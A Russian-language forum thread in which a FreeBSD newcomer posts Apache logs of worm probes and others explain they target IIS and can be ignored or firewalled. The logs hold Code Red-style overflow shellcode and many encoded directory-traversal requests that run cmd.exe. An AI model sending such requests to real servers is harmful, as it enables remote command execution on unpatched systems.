Вопрос чайника. Apache атакуют.

[Guest]

Чайник я в freeBSD. Установил apache. Каждый день в логах нечто такое вижу:

 

212.209.9.218 - - [18/Jan/2003:20:45:42 +0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 321

217.59.132.186 - - [19/Jan/2003:00:13:04 +0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 279

217.59.132.186 - - [19/Jan/2003:00:13:05 +0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 277

217.59.132.186 - - [19/Jan/2003:00:13:05 +0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 287

217.59.132.186 - - [19/Jan/2003:00:13:05 +0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 287

217.59.132.186 - - [19/Jan/2003:00:13:06 +0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301

217.59.132.186 - - [19/Jan/2003:00:13:06 +0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 318

217.59.132.186 - - [19/Jan/2003:00:13:07 +0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 318

217.59.132.186 - - [19/Jan/2003:00:13:07 +0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334

217.59.132.186 - - [19/Jan/2003:00:13:08 +0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300

217.59.132.186 - - [19/Jan/2003:00:13:09 +0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300

217.59.132.186 - - [19/Jan/2003:00:13:09 +0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300

217.59.132.186 - - [19/Jan/2003:00:13:09 +0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300

217.59.132.186 - - [19/Jan/2003:00:13:10 +0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 284

217.59.132.186 - - [19/Jan/2003:00:13:10 +0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 284

217.59.132.186 - - [19/Jan/2003:00:13:11 +0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301

217.59.132.186 - - [19/Jan/2003:00:13:11 +0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301

217.64.110.148 - - [19/Jan/2003:10:50:44 +0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 279

217.64.110.148 - - [19/Jan/2003:10:50:46 +0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 277

217.64.110.148 - - [19/Jan/2003:10:50:48 +0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 287

217.64.110.148 - - [19/Jan/2003:10:50:49 +0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 287

217.64.110.148 - - [19/Jan/2003:10:50:51 +0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301

217.64.110.148 - - [19/Jan/2003:10:50:53 +0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 318

217.64.110.148 - - [19/Jan/2003:10:50:54 +0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 318

217.64.110.148 - - [19/Jan/2003:10:50:56 +0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334

217.64.110.148 - - [19/Jan/2003:10:50:58 +0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300

217.64.110.148 - - [19/Jan/2003:10:51:00 +0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300

217.64.110.148 - - [19/Jan/2003:10:51:01 +0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300

217.64.110.148 - - [19/Jan/2003:10:51:03 +0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300

217.64.110.148 - - [19/Jan/2003:10:51:05 +0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 284

217.64.110.148 - - [19/Jan/2003:10:51:07 +0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 284

217.64.110.148 - - [19/Jan/2003:10:51:08 +0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301

217.64.110.148 - - [19/Jan/2003:10:51:10 +0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301

 

причем адреса разные. В принципе, скрипты у меня не подняты, страницы статические. Надо ли с этим бороться и как?

[XiBlue]

Если это, то не страшно, просто у вас или у кого то есть завирусованый комп, т.е. на нем черв прижился. Выяснить и лечить. У меня за день бывает за десяток таких вылазок. Фигня это все.

[Guest]

Если это, то не страшно, просто у вас или у кого то есть завирусованый комп, т.е. на нем черв прижился. Выяснить и лечить. У меня за день бывает за десяток таких вылазок. Фигня это все.

 

Адреса не принадлежат нашей сети. Судя по сервису whois, адреса или московские, или буржуйские (сша, юго-восточная азия).

[Dimka]

Берет просто народ сканоры на дырявые скрипты и сканят большой диапазон ип.. судя по твоим логам , эти юные хаксоры сканят на дырки в стандартных скриптах IIS , атк что не волнуйся

[ZPS]

У меня лог на несколько кб в день рос из-за такой ерунды, потом я логи вырубил :)

Это действительно просто сканер... Дергаться стоит только если у тебя такие скрипты есть, какие запрашивает сканер.

[j262]

по началу меня эти логи тоже нервировали , вот я и начал создавать список ip

(предварительно выясняя что они далеко не местные) которые нафиг отрубал фаёрволом ( все равно на сайт мною ад-емый никого из зарубежья пускать не имеет смысла) зато логи нормальные